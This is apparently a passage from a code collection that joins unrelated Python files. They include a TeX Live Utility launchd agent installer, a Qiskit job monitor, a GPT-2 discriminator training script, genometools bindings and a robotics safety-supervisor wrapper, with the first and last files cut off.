self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4),
('tf_cam_ego', 'tf_cam_ego', 16),
('Object BB Size (len|wid|hei|diam) [{}]'.format(all_name_str), '3d_bb_dims', 4*len(self.names))]
# create files and write headers
self.fh = defaultdict(dict)
for m in self.modes:
for n in self.names:
# Create logs
fn = self.base_path + '_' + n + '_'+ m + '.log'
self.create_file_dir(fn)
self.fh[m][n] = open(fn,'w+') # doing this here makes it appendable
save_el_shape = (len(self.save_elms[m]), len(self.save_elms[m][0]))
data_header = ", ".join(np.reshape([*zip(self.save_elms[m])], save_el_shape)[:,0].tolist())
np.savetxt(self.fh[m][n], X=[], header=data_header) # write header
def init_read(self):
self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4),
('tf_cam_ego', 'tf_cam_ego', 16),
('Object BB Size (len|wid|hei|diam) []', '3d_bb_dims', -1)]
self.read_params()
self.fn = defaultdict(dict)
for m in self.modes:
for n in self.names:
self.fn[m][n] = self.base_path + '_' + n + '_'+ m + '.log'
def write_params(self, param_data, mode='prms'):
# write header
self.create_file_dir(self.prm_fn)
prm_fh = open(self.prm_fn,'w+') # doing this here makes it appendable
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
data_header = ", ".join(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,0].tolist())
np.savetxt(prm_fh, X=[], header=data_header) # write header
# write body
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int))
out = np.ones((1, num_to_write)) * 1e10
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]):
if dict_str in param_data:
try:
out[0, ind:(ind + count)] = param_data[dict_str]
except:
print("issue with {}".format(dict_str))
pdb.set_trace()
ind += count
out[out>1e5] = np.nan
np.savetxt(prm_fh, X=out, fmt='%.6f') # write to file
prm_fh.close()
def read_params(self, log_type='prms'):
# get header
f = open(self.prm_fn)
header_str = f.readline()
self.log_data[log_type]['ado_names'] = header_str.split('[')[1].split(']')[0].split(' ')
self.names = self.log_data[log_type]['ado_names']
# Read rest of file
data = np.loadtxt(self.prm_fn)
f.close()
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]):
if len(data.shape) > 1:
self.log_data[log_type][dict_str] = data[:, ind:(ind + count)]
else:
self.log_data[log_type][dict_str] = data[ind:(ind + count)]
ind += count
if dict_str == 'K': # Turn camera intrinsics back into a matrix
K = np.eye(3)
K[0, 0] = self.log_data[log_type][dict_str][0]
K[1, 1] = self.log_data[log_type][dict_str][1]
K[0, 2] = self.log_data[log_type][dict_str][2]
K[1, 2] = self.log_data[log_type][dict_str][3]
self.log_data[log_type][dict_str] = K
elif dict_str == 'tf_cam_ego':
self.log_data[log_type][dict_str] = np.reshape(self.log_data[log_type][dict_str], (4, 4))
elif dict_str == '3d_bb_dims':
all_sizes = np.asarray(data[ind : ind + 4*len(self.log_data[log_type]['ado_names'])])
bb_3d_dict_all = {}
for k, name in enumerate(self.log_data[log_type]['ado_names']):
bb_3d_dict_all[name] = all_sizes[4*k : 4*k+4] # len|wid|hei|diam
self.log_data[log_type][dict_str] = bb_3d_dict_all
return self.log_data[log_type]
def write_data_to_log(self, data, name, mode):
""" mode can be est, gt, ssp"""
if (not self.b_ssp and not mode in ['est', 'gt']) or (self.b_ssp and not mode == 'ssp'):
raise RuntimeError("Mode {} not recognized".format(mode))
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int))
out = np.ones((1, num_to_write)) * 1e10
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]):
if dict_str in data:
try:
out[0, ind:(ind + count)] = data[dict_str]
except:
print("issue with {}".format(dict_str))
pdb.set_trace()
ind += count
out[out>1e5] = np.nan
np.savetxt(self.fh[mode][name], X=out, fmt='%.6f') # write to file
def read_logs(self, name):
"""
Return a dict with keys being log type (est /gt /prms). Each of these is a dict with the various types of values in the log
"""
if self.names is None:
self.log_data[log_type]
for log_type in self.fn:
if not log_type in self.save_elms:
print("Warning: we are are missing the log file for {}".format(log_type))
continue
ind = 0
data = np.loadtxt(self.fn[log_type][name])
for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]):
if len(data.shape) > 1:
self.log_data[log_type][dict_str] = data[:, ind:(ind + count)]
else:
self.log_data[log_type][dict_str] = data[ind:(ind + count)]
ind += count
return self.log_data
def close_files(self):
for fh_key in self.fh:
if fh_key == 'prms':
self.fh[fh_key].close()
continue
for n in self.names:
self.fh[fh_key][n].close()
def create_file_dir(self, fn_with_dir):
path = "/".join(fn_with_dir.split("/")[:-1])
if not os.path.exists( path ):
os.makedirs( path )
|
py | 1a3f84f7581414e7d676e1866622ffaa8bc03e29 | #!/usr/bin/env python
#
# This software is Copyright (c) 2010-2016
# Adam Maxwell. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# - Neither the name of Adam Maxwell nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from optparse import OptionParser
import os
import sys
from subprocess import call as sync_task
from shutil import copy2 as copyfile
import plistlib
LAUNCHCTL_PATH = "/bin/launchctl"
SCRIPT_NAME = "texliveupdatecheck"
PLIST_NAME = "com.googlecode.mactlmgr.update_check.plist"
def log_message(msg):
"""write a message to standard output"""
sys.stderr.write("%s: %s\n" % (os.path.basename(sys.argv[0]), msg))
def installed_plist_path():
"""absolute path to the installed plist for the process owner"""
plist_dir = "/Library/LaunchAgents" if os.geteuid() == 0 else os.path.expanduser("~/Library/LaunchAgents")
return os.path.join(plist_dir, PLIST_NAME)
def installed_script_path():
"""absolute path to the installed script for the process owner"""
script_dir = "/Library/Application Support/TeX Live Utility"
if os.geteuid() != 0:
script_dir = os.path.expanduser("~" + script_dir)
return os.path.join(script_dir, SCRIPT_NAME)
def unload_agent():
"""returns zero in case of success or if the plist does not exist"""
plist_path = installed_plist_path()
ret = 0
if os.path.exists(plist_path):
ret = sync_task([LAUNCHCTL_PATH, "unload", "-w", "-S", "Aqua", plist_path])
else:
log_message("nothing to unload")
if ret:
log_message("unable to unload agent %s" % (plist_path))
return ret
def load_agent():
"""returns zero if the plist was loaded, raises if it does not exist"""
plist_path = installed_plist_path()
assert os.path.exists(plist_path), "%s does not exist" % (plist_path)
ret = sync_task([LAUNCHCTL_PATH, "load", "-w", "-S", "Aqua", plist_path])
if ret:
log_message("unable to load agent %s" % (plist_path))
return ret
def uninstall_agent():
"""returns nonzero if the plist exists and could not be unloaded"""
plist_path = installed_plist_path()
ret = 0
# nonexistence is not a failure
if os.path.exists(plist_path):
try:
os.remove(plist_path)
except Exception as e:
log_message("ERROR: failed to remove %s" % (plist_path))
ret = 1
else:
log_message("nothing to remove")
return ret
def sync_agent_program_name():
"""ensure the launch agent plist has the current program name"""
plist_path = installed_plist_path()
exec_path = installed_script_path()
# mainly for the change from Python update checker to Obj-C
if os.path.exists(plist_path) and os.path.exists(exec_path):
unload_agent()
try:
# Now edit the plist in-memory so it points to the correct path,
# then save it out to the destination directory (avoids modifying
# the passed-in file).
with open(plist_path, "rb") as plfile:
plist = plistlib.load(plfile)
# rewrite entire array
plist["ProgramArguments"] = [exec_path]
with open(plist_path, "wb") as plfile:
plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML)
except Exception as e:
log_message("ERROR: failed to regenerate launchd plist %s with exception %s" % (plist_path, e))
else:
load_agent()
def install_agent(source_path):
"""argument is absolute path to the source property list"""
plist_path = installed_plist_path()
plist_dir = os.path.dirname(plist_path)
ret = 0
if os.path.exists(plist_dir) == False:
try:
os.makedirs(plist_dir)
except Exception as e:
log_message("ERROR: failed to create %s" % (plist_dir))
ret = 1
if ret == 0:
assert os.path.isdir(plist_dir), "%s is not a directory" % (plist_dir)
try:
# Now edit the plist in-memory so it points to the correct path,
# then save it out to the destination directory (avoids modifying
# the passed-in file).
with open(source_path, "rb") as plfile:
plist = plistlib.load(plfile)
# rewrite entire array
plist["ProgramArguments"] = [installed_script_path()]
with open(plist_path, "wb") as plfile:
plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML)
except Exception as e:
log_message("ERROR: failed to copy %s --> %s" % (source_path, plist_path))
ret = 1
return ret
def install_script(source_path):
"""argument is absolute path to the source script"""
script_path = installed_script_path()
script_dir = os.path.dirname(script_path)
ret = 0
if os.path.exists(script_dir) == False:
try:
os.makedirs(script_dir)
except Exception as e:
log_message("ERROR: failed to create %s" % (script_dir))
ret = 1
if ret == 0:
assert os.path.isdir(script_dir), "%s is not a directory" % (script_dir)
try:
copyfile(source_path, script_path)
except Exception as e:
log_message("ERROR: failed to copy %s --> %s" % (source_path, script_path))
ret = 1
return ret
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-i", "--install", help="install agent", action="store_true", dest="install", default=False)
parser.add_option("-r", "--remove", help="remove agent", action="store_true", dest="remove", default=False)
parser.add_option("-p", "--plist", help="path of property list to install", action="store", type="string", dest="source_plist")
parser.add_option("-s", "--script", help="path of script to install", action="store", type="string", dest="source_script")
(options, args) = parser.parse_args()
if options.install == options.remove:
if options.install == False:
parser.error("an action (install or remove) must be specified")
else:
parser.error("only one action may be specified")
if options.install:
if options.source_plist is None and options.source_script is None:
parser.error("at least one of option -p or -s is required")
# if os.path.isabs(options.source_plist) == False or os.path.isabs(options.source_script) == False:
# parser.error("path arguments must be absolute")
if options.source_plist and not os.path.isfile(options.source_plist):
parser.error("path arguments cannot point to a directory")
assert os.path.basename(options.source_plist) == PLIST_NAME, "incorrect plist name defined"
if options.source_script and not os.path.isfile(options.source_script):
parser.error("path arguments cannot point to a directory")
assert os.path.basename(options.source_script) == SCRIPT_NAME, "incorrect script name defined"
status = 0
if options.remove:
status += unload_agent()
status += uninstall_agent()
else:
assert options.install, "inconsistent option checking"
# unload a previous version before installing
if options.source_plist:
status += unload_agent()
if options.source_script:
status += install_script(options.source_script)
# if unloaded and we have a plist, now try to install and load it
if status == 0 and options.source_plist:
status = install_agent(options.source_plist)
if status == 0:
status = load_agent()
# in case the name of the script has changed; will also unload/reload
if 0 == status:
sync_agent_program_name()
exit(status)
|
py | 1a3f851cd15ad627a0fbbb015e21d699cb93df63 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Daniel Standage <[email protected]>
# Copyright (c) 2008 Sascha Steinbiss <[email protected]>
# Copyright (c) 2008 Center for Bioinformatics, University of Hamburg
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from gt.dlload import gtlib
from gt.annotationsketch.rec_map import RecMap
import math
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
class ImageInfo:
def __init__(self):
self.ii = gtlib.gt_image_info_new()
self._as_parameter_ = self.ii
self.hotspots = None
def __del__(self):
try:
gtlib.gt_image_info_delete(self.ii)
except AttributeError:
pass
def from_param(cls, obj):
if not (isinstance(obj, ImageInfo) or obj == None):
raise TypeError("argument must be an ImageInfo")
if obj == None:
return None
return obj._as_parameter_
from_param = classmethod(from_param)
def get_height(self):
return gtlib.gt_image_info_get_height(self.ii)
def num_of_rec_maps(self):
return gtlib.gt_image_info_num_of_rec_maps(self.ii)
def compare_hotspots(cls, hs1, hs2):
if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1:
return 1
elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1:
if hs1[3] > hs2[3]:
return 1
elif hs1[3] == hs2[3]:
return 0
else:
return -1
else:
return -1
compare_hotspots = classmethod(compare_hotspots)
def each_hotspot(self):
if not self.hotspots:
self.hotspots = []
for i in range(self.num_of_rec_maps()):
rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i))
self.hotspots.append([math.floor(rm.get_northwest_x()),
math.floor(rm.get_northwest_y()),
math.floor(rm.get_southeast_x()),
math.floor(rm.get_southeast_y()),
rm.get_genome_feature()])
self.hotspots.sort(key=cmp_to_key(ImageInfo.compare_hotspots))
for hs in self.hotspots:
yield (hs[0], hs[1], hs[2], hs[3], hs[4])
def register(cls, gtlib):
from ctypes import c_void_p, c_ulong, c_uint
gtlib.gt_image_info_delete.restype = None
gtlib.gt_image_info_delete.argtypes = [c_void_p]
gtlib.gt_image_info_get_rec_map.restype = c_void_p
gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong]
gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong
gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p]
gtlib.gt_image_info_get_height.restype = c_uint
gtlib.gt_image_info_get_height.argtypes = [c_void_p]
gtlib.gt_image_info_new.restype = c_void_p
gtlib.gt_image_info_new.argtypes = []
register = classmethod(register)
|
py | 1a3f85bbedeed244c772f25976b32a12411e0eba | # This problem was asked by Facebook.
#
# Given the mapping a = 1, b = 2, ... z = 26, and an encoded message, count the number of ways it can be decoded.
#
# For example, the message '111' would give 3, since it could be decoded as 'aaa', 'ka', and 'ak'.
#
# You can assume that the messages are decodable. For example, '001' is not allowed.
|
py | 1a3f8667207df54e760f93b967c9c212d1a0e9ac | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A module for monitoring various qiskit functionality"""
import sys
import time
def _text_checker(job, interval, _interval_set=False, quiet=False, output=sys.stdout):
"""A text-based job status checker
Args:
job (BaseJob): The job to check.
interval (int): The interval at which to check.
_interval_set (bool): Was interval time set by user?
quiet (bool): If True, do not print status messages.
output (file): The file like object to write status messages to.
By default this is sys.stdout.
"""
status = job.status()
msg = status.value
prev_msg = msg
msg_len = len(msg)
if not quiet:
print('\r%s: %s' % ('Job Status', msg), end='', file=output)
while status.name not in ['DONE', 'CANCELLED', 'ERROR']:
time.sleep(interval)
status = job.status()
msg = status.value
if status.name == 'QUEUED':
msg += ' (%s)' % job.queue_position()
if job.queue_position() is None:
interval = 2
elif not _interval_set:
interval = max(job.queue_position(), 2)
else:
if not _interval_set:
interval = 2
# Adjust length of message so there are no artifacts
if len(msg) < msg_len:
msg += ' ' * (msg_len - len(msg))
elif len(msg) > msg_len:
msg_len = len(msg)
if msg != prev_msg and not quiet:
print('\r%s: %s' % ('Job Status', msg), end='', file=output)
prev_msg = msg
if not quiet:
print('', file=output)
def job_monitor(job, interval=None, quiet=False, output=sys.stdout):
"""Monitor the status of a IBMQJob instance.
Args:
job (BaseJob): Job to monitor.
interval (int): Time interval between status queries.
quiet (bool): If True, do not print status messages.
output (file): The file like object to write status messages to.
By default this is sys.stdout.
"""
if interval is None:
_interval_set = False
interval = 5
else:
_interval_set = True
_text_checker(job, interval, _interval_set,
quiet=quiet, output=output)
|
py | 1a3f86b61381e0998c5cf08122cf44c91473a22d | #! /usr/bin/env python3
# coding=utf-8
# This code is licensed under a non-commercial license.
import os
import sys
import argparse
from tqdm import trange
from torchtext import data as torchtext_data
from torchtext import datasets
import torch
import torch.utils.data as data
from torchtext.vocab import Vectors, GloVe, CharNGram, FastText
from nltk.tokenize.treebank import TreebankWordDetokenizer
import torch
import torch.optim
import torch.nn.functional as F
import numpy as np
from IPython import embed
from operator import add
from run_gpt2 import top_k_logits
from style_utils import to_var
import copy
import pickle
from torch.utils.data import DataLoader
from torch.utils.data.dataset import random_split
import torch.optim as optim
torch.manual_seed(0)
np.random.seed(0)
lab_root = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', '..')
sys.path.insert(1, lab_root)
from pytorch_pretrained_bert import GPT2LMHeadModel, GPT2Tokenizer
from torch.autograd import Variable
tokenizer = GPT2Tokenizer.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium')
model = GPT2LMHeadModel.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium')
class ClassificationHead(torch.nn.Module):
""" Language Model Head for the transformer """
def __init__(self, class_size=5, embed_size=2048):
super(ClassificationHead, self).__init__()
self.class_size = class_size
self.embed_size = embed_size
# self.mlp1 = torch.nn.Linear(embed_size, embed_size)
# self.mlp2 = (torch.nn.Linear(embed_size, class_size))
self.mlp = (torch.nn.Linear(embed_size, class_size))
def forward(self, hidden_state):
# Truncated Language modeling logits (we remove the last token)
# h_trunc = h[:, :-1].contiguous().view(-1, self.n_embd)
# lm_logits = F.relu(self.mlp1(hidden_state))
# lm_logits = self.mlp2(lm_logits)
lm_logits = self.mlp(hidden_state)
return lm_logits
class Discriminator(torch.nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
self.classifierhead = ClassificationHead()
self.model = model
self.spltoken = Variable(torch.randn(1, 1, 1024).type(torch.FloatTensor), requires_grad=True)
self.spltoken = self.spltoken.repeat(10, 1, 1)
self.spltoken = self.spltoken.cuda()
def train(self):
for param in self.model.parameters():
param.requires_grad = False
pass
def forward(self, x):
x = model.forward_embed(x)
x = torch.cat((x, self.spltoken), dim=1)
_, x = model.forward_transformer_embed(x, add_one=True)
x = self.classifierhead(x[-1][:, -1, :])
x = F.log_softmax(x, dim=-1)
return x
class Discriminator2(torch.nn.Module):
def __init__(self, class_size=5, embed_size=1024):
super(Discriminator2, self).__init__()
self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size)
self.model = model
self.embed_size = embed_size
def get_classifier(self):
return self.classifierhead
def train_custom(self):
for param in self.model.parameters():
param.requires_grad = False
pass
self.classifierhead.train()
def forward(self, x):
x = model.forward_embed(x)
hidden, x = model.forward_transformer_embed(x)
x = torch.sum(hidden, dim=1)
x = self.classifierhead(x)
x = F.log_softmax(x, dim=-1)
return x
class Discriminator2mean(torch.nn.Module):
def __init__(self, class_size=5, embed_size=1024):
super(Discriminator2mean, self).__init__()
self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size)
self.model = model
self.embed_size = embed_size
def get_classifier(self):
return self.classifierhead
def train_custom(self):
for param in self.model.parameters():
param.requires_grad = False
pass
self.classifierhead.train()
def forward(self, x):
mask_src = 1 - x.eq(0).unsqueeze(1).type(torch.FloatTensor).cuda().detach()
mask_src = mask_src.repeat(1, self.embed_size, 1)
x = model.forward_embed(x)
hidden, x = model.forward_transformer_embed(x)
# Hidden has shape batch_size x length x embed-dim
hidden = hidden.permute(0, 2, 1)
_, _, batch_length = hidden.shape
hidden = hidden * mask_src # / torch.sum(mask_src, dim=-1).unsqueeze(2).repeat(1, 1, batch_length)
#
hidden = hidden.permute(0, 2, 1)
x = torch.sum(hidden, dim=1)/(torch.sum(mask_src, dim=-1).detach() + 1e-10)
x = self.classifierhead(x)
x = F.log_softmax(x, dim=-1)
return x
class Dataset(data.Dataset):
def __init__(self, X, y):
"""Reads source and target sequences from txt files."""
self.X = X
self.y = y
def __len__(self):
return len(self.X)
def __getitem__(self, index):
"""Returns one data pair (source and target)."""
d = {}
d['X'] = self.X[index]
d['y'] = self.y[index]
return d
def collate_fn(data):
def merge(sequences):
lengths = [len(seq) for seq in sequences]
padded_seqs = torch.zeros(len(sequences), max(lengths)).long().cuda() # padding index 0
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[i, :end] = seq[:end]
return padded_seqs, lengths
data.sort(key=lambda x: len(x["X"]), reverse=True) # sort by source seq
item_info = {}
for key in data[0].keys():
item_info[key] = [d[key] for d in data]
# input
x_batch, _ = merge(item_info['X'])
y_batch = item_info['y']
return x_batch, torch.tensor(y_batch, device='cuda', dtype=torch.long)
def train_epoch(data_loader, discriminator, device='cuda', args=None, epoch=1):
optimizer = optim.Adam(discriminator.parameters(), lr=0.0001)
discriminator.train_custom()
for batch_idx, (data, target) in enumerate(data_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = discriminator(data)
loss = F.nll_loss(output, target)
loss.backward(retain_graph=True)
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Relu Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(data_loader.dataset),
100. * batch_idx / len(data_loader), loss.item()))
def test_epoch(data_loader, discriminator, device='cuda', args=None):
discriminator.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in data_loader:
data, target = data.to(device), target.to(device)
output = discriminator(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(data_loader.dataset)
print('\nRelu Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(data_loader.dataset),
100. * correct / len(data_loader.dataset)))
def main():
parser = argparse.ArgumentParser(description='Train a discriminator on top of GPT-2 representations')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='Number of training epochs')
parser.add_argument('--save-model', action='store_true', help='whether to save the model')
parser.add_argument('--dataset-label', type=str, default='SST',choices=('SST', 'clickbait', 'toxic'))
args = parser.parse_args()
batch_size = args.batch_size
device = 'cuda'
# load sst
if args.dataset_label == 'SST':
text = torchtext_data.Field()
label = torchtext_data.Field(sequential=False)
train_data, val_data, test_data = datasets.SST.splits(text, label, fine_grained=True, train_subtrees=True,
# filter_pred=lambda ex: ex.label != 'neutral'
)
x = []
y = []
d = {"positive": 0, "negative": 1, "very positive": 2, "very negative": 3, "neutral": 4}
for i in range(len(train_data)):
seq = TreebankWordDetokenizer().detokenize(vars(train_data[i])["text"])
seq = tokenizer.encode(seq)
seq = torch.tensor(seq, device=device, dtype=torch.long)
x.append(seq)
y.append(d[vars(train_data[i])["label"]])
dataset = Dataset(x, y)
test_x = []
test_y = []
for i in range(len(test_data)):
seq = TreebankWordDetokenizer().detokenize(vars(test_data[i])["text"])
seq = tokenizer.encode(seq)
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
test_x.append(seq)
test_y.append(d[vars(test_data[i])["label"]])
test_dataset = Dataset(test_x, test_y)
discriminator = Discriminator2mean(class_size=5).to(device)
elif args.dataset_label == 'clickbait':
# data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r"))
with open("datasets/clickbait/clickbait_train_prefix.txt") as f:
data = []
for d in f:
try:
data.append(eval(d))
except:
continue
x = []
y = []
for d in data:
try:
# seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost")
try:
seq = tokenizer.encode(d["text"])
except:
continue
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
x.append(seq)
y.append(d['label'])
except:
pass
dataset = Dataset(x, y)
train_size = int(0.9 * len(dataset))
test_size = len(dataset) - train_size
dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])
discriminator = Discriminator2mean(class_size=2).to(device)
elif args.dataset_label == 'toxic':
# data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r"))
with open("datasets/toxic/toxic_train.txt") as f:
data = []
for d in f:
data.append(eval(d))
x = []
y = []
for d in data:
try:
# seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost")
seq = tokenizer.encode(d["text"])
device = 'cuda'
if(len(seq)<100):
seq = torch.tensor([50256] + seq, device=device, dtype=torch.long)
else:
continue
x.append(seq)
y.append(int(np.sum(d['label'])>0))
except:
pass
dataset = Dataset(x, y)
print(dataset)
print(len(dataset))
train_size = int(0.9 * len(dataset))
test_size = len(dataset) - train_size
dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])
discriminator = Discriminator2mean(class_size=2).to(device)
data_loader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=True, collate_fn=collate_fn)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size, collate_fn=collate_fn)
for epoch in range(args.epochs):
train_epoch(discriminator=discriminator, data_loader=data_loader, args=args, device=device, epoch=epoch)
test_epoch(data_loader=test_loader, discriminator=discriminator, args=args)
seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.")
seq = torch.tensor([seq], device=device, dtype=torch.long)
print(discriminator(seq))
if (args.save_model):
torch.save(discriminator.state_dict(),
"discrim_models/{}_mean_lin_discriminator_{}.pt".format(args.dataset_label, epoch))
torch.save(discriminator.get_classifier().state_dict(),
"discrim_models/{}_classifierhead.pt".format(args.dataset_label))
seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.")
seq = torch.tensor([seq], device=device, dtype=torch.long)
print(discriminator(seq))
if __name__ == '__main__':
main()
|
py | 1a3f86d8374a1c6286d9de192e904277bb3a7615 | import os
broker_url = os.environ.get('BROKER_URL')
broker_use_ssl = os.environ.get('BROKER_USE_SSL', False)
worker_concurrency = 1
worker_prefetch_multiplier = 1
task_acks_late = True
|
py | 1a3f87fb8c9722233ddc9491aaca58044938ae02 | """Compute the largest double precision number that doesn't cause
exp/cosh/sinh to overflow.
"""
import numpy as np
np.seterr(all='ignore')
def find_overflow(f, a, b):
# Start with a binary search
while True:
mid = 0.5*(a + b)
if f(mid) == np.inf:
b = mid
else:
a = mid
if abs(b - a) < 1e-12:
break
# Polish with a brute force search
while True:
b = np.nextafter(a, np.inf)
res = np.exp(b)
if res == np.inf:
return a
else:
a = b
def main():
a = find_overflow(np.exp, 709.7, 709.9)
print("a = {:.20g}, np.exp(a) = {}".format(a, np.exp(a)))
a = find_overflow(np.cosh, 710, 711)
print("a = {:.20g}, np.cosh(a) = {}".format(a, np.cosh(a)))
a = find_overflow(np.sinh, 710, 711)
print("a = {:.20g}, np.sinh(a) = {}".format(a, np.sinh(a)))
if __name__ == '__main__':
main()
|
py | 1a3f889f231cdd1f100c3c394cdf7ea5b3d1c5bc | # load extern modules
import gym
import csv
import time
import numpy as np
from stable_baselines.bench import Monitor
from supervisors.utils import distance_from_obstacles
from env.utils import obs_lidar_pseudo
import threading
from supervisors.cbf import initialize_gp_dynamics, predict_successor_state_gp, initialize_svm_prediction
from supervisors.cbf import initialize_svm_prediction_gp
from operator import itemgetter
from skopt.space import Space
from skopt.sampler import Grid
# from qpsolvers import solve_qp
class Supervisor(Monitor):
"""
A monitor wrapper for Gym environments to save collisions events
Parameters:
env (gym.Env): The environment
filename (Optional[str]): the location to save a log file, can be None for no log
"""
def __init__(self,
env: gym.Env,
filename: str,
safety_distance: float or None,
visibility: float,
safe_info: bool,
safe_states: bool,
supervisor: str,
coordinates_static_obstacles: np.array,
lidar_num_bins: int,
which_static: int,
record_svm_gp: bool,
cbf_quadratic: bool,
cbf_learn_online: bool,
rewards: np.array or None,
num_prior_data_cbf: str or None,
search_space: str or None,
scale_reward: bool):
super(Supervisor, self).__init__(env=env, filename=filename)
self.safety_distance = safety_distance
self.visibility = visibility
self.supervisor = supervisor
self.lidar_num_bins = lidar_num_bins
self.Supervised = 0
self.Intervention = 0
self.SafelyDone = 0
self.scale_reward = scale_reward
